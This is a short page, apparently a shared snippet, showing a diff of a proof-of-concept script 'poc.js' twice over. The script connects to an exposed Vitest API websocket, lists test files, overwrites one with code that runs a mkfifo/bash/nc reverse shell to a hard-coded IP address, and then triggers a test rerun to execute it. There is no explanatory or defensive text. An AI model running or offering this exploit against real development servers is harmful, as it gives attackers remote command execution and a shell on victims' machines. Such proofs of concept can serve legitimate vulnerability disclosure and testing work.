david-botelho-mariano · December 14, 2025 22:20
diff --git a/poc.js b/poc.js

 const {stringify} = require('flatted');
 const WebSocket = require('ws');

 // actual code to run
 const ws = new WebSocket('ws://192.168.156.207:8080/__vitest_api__')
 ws.addEventListener('message', e => {
    console.log(e.data)
 })
 ws.addEventListener('open', () => {
    ws.send(stringify({ t: 'q', i: crypto.randomUUID(), m: "getFiles", a: [] }))

  const testFilePath = "/home/viter/sum.test.js" // use a test file returned from the response of "getFiles"

    // edit file content to inject command execution
    ws.send(stringify({
      t: 'q',
      i: crypto.randomUUID(),
      m: "saveTestFile",
      a: [testFilePath, "import child_process from 'child_process';child_process.execSync('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.45.166 22 >/tmp/f')"]
    }))
    // rerun the tests to run the injected command execution code
    ws.send(stringify({
      t: 'q',
      i: crypto.randomUUID(),
      m: "rerun",
      a: [testFilePath]
    }))
 })

	const {stringify} = require('flatted');
	const WebSocket = require('ws');

	// actual code to run
	const ws = new WebSocket('ws://192.168.156.207:8080/__vitest_api__')
	ws.addEventListener('message', e => {
	console.log(e.data)
	})
	ws.addEventListener('open', () => {
	ws.send(stringify({ t: 'q', i: crypto.randomUUID(), m: "getFiles", a: [] }))

	const testFilePath = "/home/viter/sum.test.js" // use a test file returned from the response of "getFiles"

	// edit file content to inject command execution
	ws.send(stringify({
	t: 'q',
	i: crypto.randomUUID(),
	m: "saveTestFile",
	a: [testFilePath, "import child_process from 'child_process';child_process.execSync('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\|/bin/bash -i 2>&1\|nc 192.168.45.166 22 >/tmp/f')"]
	}))
	// rerun the tests to run the injected command execution code
	ws.send(stringify({
	t: 'q',
	i: crypto.randomUUID(),
	m: "rerun",
	a: [testFilePath]
	}))
	})
No results found